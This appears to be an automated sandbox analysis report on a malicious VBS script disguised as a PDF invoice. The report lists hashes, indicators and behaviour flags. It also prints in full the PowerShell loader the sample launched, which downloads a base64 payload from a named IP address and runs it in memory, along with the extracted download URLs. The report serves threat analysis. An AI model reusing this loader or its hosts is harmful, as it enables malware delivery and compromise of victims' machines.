Analysis
-
max time kernel
41s -
max time network
44s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-10-2022 08:19
Static task
static1
Behavioral task
behavioral1
Sample
Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
Resource
win7-20220812-en
General
-
Target
Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
-
Size
442KB
-
MD5
62174dd3cc316dff4896b292cde3eebc
-
SHA1
abc441c9636e64ff3c6a24879efc6c847640adfa
-
SHA256
1add10f411596ce592775736cbd547b0de4e69ae044173cb604bc1cb410dc424
-
SHA512
ec4d0dd87b74e8ae268d9cea674a75920b0935095c975db0f3609af176ee3392801ec9d12ad0705964fd4491bc5b05ac6f089b7b34690a64923b5fb5c098e7f3
-
SSDEEP
768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0O0gAOAqAn:7aW1AP4HgK
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1160 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1160 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1424 wrote to memory of 1160 1424 WScript.exe powershell.exe PID 1424 wrote to memory of 1160 1424 WScript.exe powershell.exe PID 1424 wrote to memory of 1160 1424 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/9EUiS/d/ee.etsap//:sptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1160-55-0x0000000000000000-mapping.dmp
-
memory/1160-57-0x000007FEF3990000-0x000007FEF43B3000-memory.dmpFilesize
10.1MB
-
memory/1160-59-0x0000000002614000-0x0000000002617000-memory.dmpFilesize
12KB
-
memory/1160-58-0x000007FEF2E30000-0x000007FEF398D000-memory.dmpFilesize
11.4MB
-
memory/1160-60-0x000000000261B000-0x000000000263A000-memory.dmpFilesize
124KB
-
memory/1160-61-0x0000000002614000-0x0000000002617000-memory.dmpFilesize
12KB
-
memory/1160-62-0x000000000261B000-0x000000000263A000-memory.dmpFilesize
124KB
-
memory/1424-54-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmpFilesize
8KB